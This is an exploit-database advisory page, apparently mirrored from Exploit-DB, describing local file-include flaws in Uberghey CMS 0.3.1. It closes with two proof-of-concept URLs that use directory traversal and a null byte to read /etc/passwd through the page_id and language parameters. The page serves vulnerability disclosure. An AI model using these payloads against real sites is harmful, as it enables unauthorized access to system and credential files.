header-logo
Suggest Exploit
vendor:
CMS
by:
SecurityFocus
7.5
CVSS
HIGH
Local File-Include
94
CWE
Product Name: CMS
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Uberghey CMS Local File-Include Vulnerabilities

Uberghey CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28217/info

Uberghey CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application.

Uberghey CMS 0.3.1 is vulnerable; other versions may also be affected. 

http://www.example.com/uberghey-0.3.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
http://www.example.com/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00

Navigation

Suggest Exploit

Services By CQR